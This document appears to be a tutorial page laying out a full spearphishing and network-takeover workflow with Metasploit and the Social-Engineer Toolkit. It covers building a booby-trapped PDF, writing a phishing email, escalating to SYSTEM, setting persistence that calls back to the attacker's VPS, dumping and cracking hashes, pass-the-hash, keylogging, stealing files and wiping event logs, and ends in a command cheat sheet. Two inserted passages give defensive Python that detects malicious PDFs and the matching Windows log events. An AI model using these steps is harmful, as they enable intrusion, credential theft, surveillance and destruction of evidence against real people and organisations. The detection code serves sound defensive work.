The Definitive Spearphish & Network Takeover Workflow
SSH into your VPS and start Metasploit:
msfconsole
Type these commands one by one:
use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 0.0.0.0
set LPORT 443
exploit -j
The listener will run in the background waiting for connections.
On Parrot OS, open SET and follow this path:
1. sudo setoolkit
2. Choose 2 - File-Format Attacks
3. Choose 1 - PDF Embedded EXE
4. Choose 13 - Adobe PDF Embedded EXE
When asked, provide a path to a legitimate PDF:
/path/to/Corporate_Compliance.pdf
This makes the file look real and trustworthy.
LHOST: Your VPS IP Address
LPORT: 443
SET saves to a hidden folder. You MUST move and rename it:
mv /root/.set/template.pdf /home/user/Desktop/Compliance_Update.pdf
If you don't do this immediately, the file will be overwritten the next time you use SET!
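For the defender reading this page, the interesting part of the "PDF Embedded EXE" template is what it leaves in the file: an embedded file stream plus an action that runs it when the document is opened. The following is an added example (not part of the original workflow, and not SET or Metasploit code) of how a mail gateway or triage script can spot those markers in an attachment. The indicator list, the sample PDFs and the verdict thresholds are constructed for the example. It also handles two evasions a naive string search misses: PDF name objects may use `#xx` hex escapes (`/#45mbeddedFile`), and the dictionaries may sit inside a FlateDecode-compressed object stream, so both are normalised before matching.

```python
import re
import zlib

# PDF name objects that carry or trigger active content. Constructed indicator
# list for this example; descriptions explain why each one matters.
SUSPICIOUS_NAMES = {
    b"/EmbeddedFile": "embedded file stream",
    b"/Launch": "launch action (runs an external program)",
    b"/OpenAction": "action fired when the document opens",
    b"/AA": "additional actions (page/field triggers)",
    b"/JavaScript": "JavaScript action",
    b"/JS": "JavaScript code",
}

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_STREAM = re.compile(rb"<<(.*?)>>\s*stream\r?\n(.*?)\r?\nendstream", re.S)


def normalize_names(data: bytes) -> bytes:
    """Resolve PDF name hex escapes such as /#45mbeddedFile -> /EmbeddedFile."""
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the decompressed contents of every FlateDecode stream.

    Dictionaries packed into object streams (/Type /ObjStm) are invisible to a
    plain string search until the stream is inflated.
    """
    out = []
    for dictionary, body in _STREAM.findall(data):
        if b"/FlateDecode" in dictionary:
            try:
                out.append(zlib.decompress(body))
            except zlib.error:
                continue  # damaged or non-zlib stream: nothing to inspect
    return b"\n".join(out)


def triage_pdf(data: bytes) -> dict:
    """Return {indicator: description} for every suspicious name found in the PDF."""
    visible = normalize_names(data)
    hidden = normalize_names(inflate_streams(data))
    hits = {}
    for name, why in SUSPICIOUS_NAMES.items():
        # Require a name boundary so /JS does not fire on unrelated longer names.
        pattern = re.compile(re.escape(name) + rb"(?![A-Za-z0-9])")
        if pattern.search(visible) or pattern.search(hidden):
            hits[name.decode()] = why
    return hits


def verdict(hits: dict) -> str:
    """Constructed policy: an embedded file plus an auto-run action is blocked outright."""
    auto_run = {"/Launch", "/JavaScript", "/JS"} & set(hits)
    if "/EmbeddedFile" in hits and auto_run:
        return "block: embedded file combined with an auto-run action"
    if hits:
        return "review: active content present"
    return "allow: no active content found"


# Constructed samples, not real documents. The second one hides a hex-escaped
# /EmbeddedFile and a /Launch action inside a compressed object stream.
BENIGN_PDF = b"%PDF-1.4\n1 0 obj\n<< /Type /Catalog /Pages 2 0 R >>\nendobj\n%%EOF\n"


def _build_malicious_sample() -> bytes:
    hidden = b"<< /Type /#45mbeddedFile /Length 0 >>\n<< /S /La#75nch /F (payload.exe) >>"
    packed = zlib.compress(hidden)
    return (b"%PDF-1.7\n1 0 obj\n<< /Type /Catalog /OpenAction 3 0 R >>\nendobj\n"
            b"4 0 obj\n<< /Type /ObjStm /Filter /FlateDecode /Length "
            + str(len(packed)).encode() + b" >>\nstream\n" + packed
            + b"\nendstream\nendobj\n%%EOF\n")


MALICIOUS_PDF = _build_malicious_sample()

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_PDF), ("malicious", MALICIOUS_PDF)):
        found = triage_pdf(sample)
        print(label, found, "->", verdict(found))
```

The script deliberately does not try to parse the full PDF object graph; it is a first-pass filter. A real gateway would also resolve indirect references, apply other filters (ASCIIHex, LZW) and extract the embedded payload for scanning.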
In SET, navigate to:
1. sudo setoolkit
2. Choose 1 - Social-Engineering Attacks
3. Choose 5 - Mass Email Attack
4. Choose 1 - Single Email Address
Use a burner Gmail account with an App Password:
Email: [email protected]
App Password: xxxxx xxxxx xxxxx xxxxx
Attachment: /home/user/Desktop/Compliance_Update.pdf
Message body: "Important: All administrative staff must review the attached compliance update by EOD."
Make it sound urgent but professional!
When your target opens the PDF, a session will appear on your VPS. Connect to it:
sessions -i 1
Find a stable Windows process to hide in:
ps
Find explorer.exe in the list and note its PID (number)
migrate [PID]
Example: migrate 1234
getsystem
getuid
You should see NT AUTHORITY\SYSTEM - this means you have full control!
This ensures you can reconnect even after they restart:
run persistence -U -i 30 -p 443 -r [Your_VPS_IP]
Even if they shut down or restart, a new session will automatically appear on your VPS!
shell
query user
This shows who else is logged into the machine or network.
arp -a
Shows all IP addresses on the local network
net view
Shows shared computers on the network
net config workstation
Tells you if the computer is part of a corporate Domain.
exit
hashdump
The output looks like this:
Username:500:LM_HASH:NTLM_HASH:::
On modern Windows, LM hashes are no longer stored, so the LM_HASH field is always the fixed "empty" value aad3b4... and is useless for cracking. You need the NTLM_HASH (the second long string).
Option A: Hashcat (GPU - FAST)
hashcat -m 1000 hashes.txt /usr/share/wordlists/rockyou.txt
Option B: John the Ripper (CPU)
john --format=NT --wordlist=/usr/share/wordlists/rockyou.txt hashes.txt
If you can't crack the password, use the hash directly to login to other servers:
use exploit/windows/smb/psexec
set RHOSTS [Target_Server_IP]
set SMBUser [Username]
set SMBPass [The_NTLM_Hash_Only]
exploit
keyscan_start
Wait a few minutes for typing to accumulate...
keyscan_dump
shell
powershell Compress-Archive -Path C:\Users\Admin\Documents\* -DestinationPath C:\Windows\Temp\data.zip
exit
download C:\Windows\Temp\data.zip /home/user/Loot/
clearev
Removes Windows Event Viewer logs
rm C:\Windows\Temp\data.zip
Deletes the zip file from their computer
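Each step of the workflow above leaves a host-side record that a defender can alert on: the psexec module with a stolen hash produces an NTLM network logon (Security Event 4624, Logon Type 3) from a host that is not in the asset inventory and installs a service (System Event 7045) whose binary does not live in a trusted directory; the persistence script writes an autorun registry value (visible as Sysmon Event 13 when Sysmon is deployed); and clearev produces Security Event 1102 / System Event 104, because the "log was cleared" record is written into the freshly emptied log and cannot itself be wiped by the same command. The following is an added detection example (not part of the original page, and not Metasploit or Windows code) that runs those rules over constructed event lines. The event lines are written in a flat Key=Value form for the example, not real EVTX or XML output; the asset inventory, the trusted-directory allow-list and all host and service names are assumptions.

```python
import re
from typing import Dict, List, Tuple

Event = Dict[str, str]
Alert = Tuple[str, str, Event]

# Assumed asset inventory and service-binary allow-list for this example.
KNOWN_WORKSTATIONS = {"WKS-014", "WKS-015", "FS01"}
TRUSTED_SERVICE_DIRS = ("C:\\Windows\\System32\\", "C:\\Program Files\\")

# Constructed sample events (values contain no spaces so the parser stays simple).
SAMPLE_EVENTS = [
    "EventID=4624 LogonType=3 AuthPackage=Kerberos Account=jsmith Workstation=WKS-014",
    "EventID=4624 LogonType=3 AuthPackage=NTLM Account=Administrator Workstation=UNKNOWN-PC",
    "EventID=7045 ServiceName=XkqLpzRtWvNmBcSd ImagePath=%SystemRoot%\\XkqLpzRt.exe",
    "EventID=7045 ServiceName=WSearch ImagePath=C:\\Windows\\System32\\SearchIndexer.exe",
    "EventID=13 TargetObject=HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\updater Details=C:\\Users\\Public\\u.vbs",
    "EventID=1102 Account=Administrator",
]


def parse_event(line: str) -> Event:
    """Parse one constructed Key=Value line into a dict."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def analyze(events: List[Event]) -> List[Alert]:
    """Apply the four host-side rules and return (severity, rule, event) tuples."""
    alerts: List[Alert] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid in ("1102", "104"):
            # Clearing the log is itself logged; treat it as a confirmed-tampering signal.
            alerts.append(("critical", "event log cleared", ev))
        elif eid == "7045":
            # Expand %SystemRoot% so the path check works on both spellings.
            path = ev.get("ImagePath", "").replace("%SystemRoot%", "C:\\Windows")
            if not path.startswith(TRUSTED_SERVICE_DIRS):
                alerts.append(("high", "service installed from untrusted path", ev))
        elif eid == "4624":
            # NTLM network logon from a host we do not know: pass-the-hash pattern.
            if (ev.get("LogonType") == "3" and ev.get("AuthPackage") == "NTLM"
                    and ev.get("Workstation") not in KNOWN_WORKSTATIONS):
                alerts.append(("medium", "NTLM network logon from unknown host", ev))
        elif eid == "13":
            # Sysmon registry-value-set under an autorun key: persistence.
            if "\\CurrentVersion\\Run\\" in ev.get("TargetObject", ""):
                alerts.append(("medium", "autorun registry value written", ev))
    return alerts


def run_sample() -> List[Alert]:
    """Parse and analyse the constructed sample events."""
    return analyze([parse_event(line) for line in SAMPLE_EVENTS])


if __name__ == "__main__":
    for severity, rule, ev in run_sample():
        print(f"[{severity}] {rule}: EventID={ev['EventID']} "
              + " ".join(f"{k}={v}" for k, v in ev.items() if k != "EventID"))
```

The Kerberos logon and the System32-hosted service in the sample produce no alert, which is the point of the allow-lists: the rules key on where a logon or binary comes from, not on the event type alone. In production the same logic would read from a SIEM or from forwarded event logs rather than from inline strings.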
| Goal | Command |
|---|---|
| System Info | sysinfo |
| Check Current User | getuid |
| Escalate Privileges | getsystem |
| List Running Processes | ps |
| Move into Process | migrate [PID] |
| Wipe Event Logs | clearev |
| Start Keylogger | keyscan_start |
| View Keylogger Data | keyscan_dump |
| Take Screenshot | screenshot |
| List Network Devices | arp -a |
| View Logged In Users | query user |
| Search for Files | search -f *.pdf |
| Create Tunnel to Internal Site | portfwd add -l 8080 -p 80 -r [Internal_IP] |
| Drop into Windows CMD | shell |
DISCLAIMER
This information is for educational purposes only. Unauthorized access to computer systems is illegal. Always have written authorization before testing.